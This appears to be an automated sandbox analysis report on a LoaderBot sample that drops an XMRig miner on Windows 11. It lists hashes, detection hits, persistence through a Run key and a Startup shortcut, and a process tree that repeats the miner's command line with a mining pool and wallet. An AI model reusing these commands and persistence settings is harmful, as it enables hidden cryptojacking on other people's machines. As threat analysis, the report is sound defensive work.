loaderbot | ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f

Analysis

max time kernel
108s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20240704-en
resource tags

arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
submitted
08/07/2024, 17:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe
Size

4.8MB
MD5

713ed47553b56e8ef7e5dd2833395594
SHA1

a8ea35bb4a054d7686157f8d5e117881ad4bf124
SHA256

ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f
SHA512

78456d3741fe92fc1ed7f3310e7582fe727ca0977af0598502177d4ddafa3f035f551d9164982791c45af61d6115d36c6f91f3fd2dbe679a80120009abfdc06a
SSDEEP

98304:6qwmqwyPesWCyNiycBRHSh5lFhpt8AZlkje6Qd9mb/IPXj4WiT:6qwmqwyPJZyNiycB4N2jVi9m7EiT

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral2/files/0x000200000002aab3-14.dat	loaderbot
behavioral2/memory/3956-22-0x0000000000820000-0x0000000000C1E000-memory.dmp	loaderbot

XMRig Miner payload 32 IoCs

miner

resource	yara_rule
behavioral2/memory/1796-38-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2216-41-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3808-45-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1320-48-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2164-52-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4756-56-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-60-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2484-64-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3904-67-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4688-70-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1004-73-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3708-76-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2584-79-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4804-82-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2884-85-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1888-88-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1428-91-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/484-94-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4720-97-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2644-100-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-103-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4404-106-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4040-109-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3004-112-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2480-115-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1188-118-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3096-121-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3580-124-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/1640-127-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3724-130-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2056-133-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2188-136-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	poldawr.exe

Executes dropped EXE 64 IoCs

pid	Process
3620	clamer.exe
3956	poldawr.exe
1796	Driver.exe
2216	Driver.exe
3808	Driver.exe
1320	Driver.exe
2164	Driver.exe
4756	Driver.exe
5016	Driver.exe
2484	Driver.exe
3904	Driver.exe
4688	Driver.exe
1004	Driver.exe
3708	Driver.exe
2584	Driver.exe
4804	Driver.exe
2884	Driver.exe
1888	Driver.exe
1428	Driver.exe
484	Driver.exe
4720	Driver.exe
2644	Driver.exe
5016	Driver.exe
4404	Driver.exe
4040	Driver.exe
3004	Driver.exe
2480	Driver.exe
1188	Driver.exe
3096	Driver.exe
3580	Driver.exe
1640	Driver.exe
3724	Driver.exe
2056	Driver.exe
2188	Driver.exe
1756	Driver.exe
3324	Driver.exe
4932	Driver.exe
400	Driver.exe
3692	Driver.exe
1424	Driver.exe
2376	Driver.exe
2160	Driver.exe
3480	Driver.exe
4808	Driver.exe
2112	Driver.exe
2888	Driver.exe
4276	Driver.exe
4740	Driver.exe
3668	Driver.exe
660	Driver.exe
1184	Driver.exe
4540	Driver.exe
2284	Driver.exe
2520	Driver.exe
3136	Driver.exe
1088	Driver.exe
908	Driver.exe
3096	Driver.exe
3424	Driver.exe
3720	Driver.exe
1864	Driver.exe
1668	Driver.exe
1472	Driver.exe
4060	Driver.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1136334635-2482839916-910800802-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\poldawr.exe"	poldawr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe
3956	poldawr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3956	poldawr.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3956	poldawr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3716 wrote to memory of 2520	3716	ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe	78
PID 3716 wrote to memory of 2520	3716	ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe	78
PID 2520 wrote to memory of 3620	2520	cmd.exe	82
PID 2520 wrote to memory of 3620	2520	cmd.exe	82
PID 3620 wrote to memory of 3956	3620	clamer.exe	83
PID 3620 wrote to memory of 3956	3620	clamer.exe	83
PID 3620 wrote to memory of 3956	3620	clamer.exe	83
PID 3956 wrote to memory of 1796	3956	poldawr.exe	85
PID 3956 wrote to memory of 1796	3956	poldawr.exe	85
PID 3956 wrote to memory of 2216	3956	poldawr.exe	90
PID 3956 wrote to memory of 2216	3956	poldawr.exe	90
PID 3956 wrote to memory of 3808	3956	poldawr.exe	94
PID 3956 wrote to memory of 3808	3956	poldawr.exe	94
PID 3956 wrote to memory of 1320	3956	poldawr.exe	98
PID 3956 wrote to memory of 1320	3956	poldawr.exe	98
PID 3956 wrote to memory of 2164	3956	poldawr.exe	102
PID 3956 wrote to memory of 2164	3956	poldawr.exe	102
PID 3956 wrote to memory of 4756	3956	poldawr.exe	106
PID 3956 wrote to memory of 4756	3956	poldawr.exe	106
PID 3956 wrote to memory of 5016	3956	poldawr.exe	166
PID 3956 wrote to memory of 5016	3956	poldawr.exe	166
PID 3956 wrote to memory of 2484	3956	poldawr.exe	224
PID 3956 wrote to memory of 2484	3956	poldawr.exe	224
PID 3956 wrote to memory of 3904	3956	poldawr.exe	175
PID 3956 wrote to memory of 3904	3956	poldawr.exe	175
PID 3956 wrote to memory of 4688	3956	poldawr.exe	122
PID 3956 wrote to memory of 4688	3956	poldawr.exe	122
PID 3956 wrote to memory of 1004	3956	poldawr.exe	126
PID 3956 wrote to memory of 1004	3956	poldawr.exe	126
PID 3956 wrote to memory of 3708	3956	poldawr.exe	187
PID 3956 wrote to memory of 3708	3956	poldawr.exe	187
PID 3956 wrote to memory of 2584	3956	poldawr.exe	134
PID 3956 wrote to memory of 2584	3956	poldawr.exe	134
PID 3956 wrote to memory of 4804	3956	poldawr.exe	195
PID 3956 wrote to memory of 4804	3956	poldawr.exe	195
PID 3956 wrote to memory of 2884	3956	poldawr.exe	199
PID 3956 wrote to memory of 2884	3956	poldawr.exe	199
PID 3956 wrote to memory of 1888	3956	poldawr.exe	146
PID 3956 wrote to memory of 1888	3956	poldawr.exe	146
PID 3956 wrote to memory of 1428	3956	poldawr.exe	207
PID 3956 wrote to memory of 1428	3956	poldawr.exe	207
PID 3956 wrote to memory of 484	3956	poldawr.exe	154
PID 3956 wrote to memory of 484	3956	poldawr.exe	154
PID 3956 wrote to memory of 4720	3956	poldawr.exe	158
PID 3956 wrote to memory of 4720	3956	poldawr.exe	158
PID 3956 wrote to memory of 2644	3956	poldawr.exe	219
PID 3956 wrote to memory of 2644	3956	poldawr.exe	219
PID 3956 wrote to memory of 5016	3956	poldawr.exe	166
PID 3956 wrote to memory of 5016	3956	poldawr.exe	166
PID 3956 wrote to memory of 4404	3956	poldawr.exe	170
PID 3956 wrote to memory of 4404	3956	poldawr.exe	170
PID 3956 wrote to memory of 4040	3956	poldawr.exe	231
PID 3956 wrote to memory of 4040	3956	poldawr.exe	231
PID 3956 wrote to memory of 3004	3956	poldawr.exe	178
PID 3956 wrote to memory of 3004	3956	poldawr.exe	178
PID 3956 wrote to memory of 2480	3956	poldawr.exe	182
PID 3956 wrote to memory of 2480	3956	poldawr.exe	182
PID 3956 wrote to memory of 1188	3956	poldawr.exe	303
PID 3956 wrote to memory of 1188	3956	poldawr.exe	303
PID 3956 wrote to memory of 3096	3956	poldawr.exe	306
PID 3956 wrote to memory of 3096	3956	poldawr.exe	306
PID 3956 wrote to memory of 3580	3956	poldawr.exe	194
PID 3956 wrote to memory of 3580	3956	poldawr.exe	194
PID 3956 wrote to memory of 1640	3956	poldawr.exe	198

C:\Users\Admin\AppData\Local\Temp\ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe
"C:\Users\Admin\AppData\Local\Temp\ae291e6482b4c6353490df035e179163b92b22bb22e0ae5cd6e83d99e47c071f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
    clamer.exe -priverdD
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\poldawr.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\poldawr.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3956
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1796
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2216
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3808
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1320
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2164
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4756
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:5016
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2484
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3904
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4688
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1004
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3708
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2584
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4804
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2884
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1888
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1428
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:484
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4720
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2644
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:5016
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4404
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:4040
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3904
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3004
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2480
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1188
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3708
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3096
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3580
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4804
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1640
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2884
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3724
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2056
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1428
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:2188
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:1756
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        Executes dropped EXE
        
        PID:3324
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
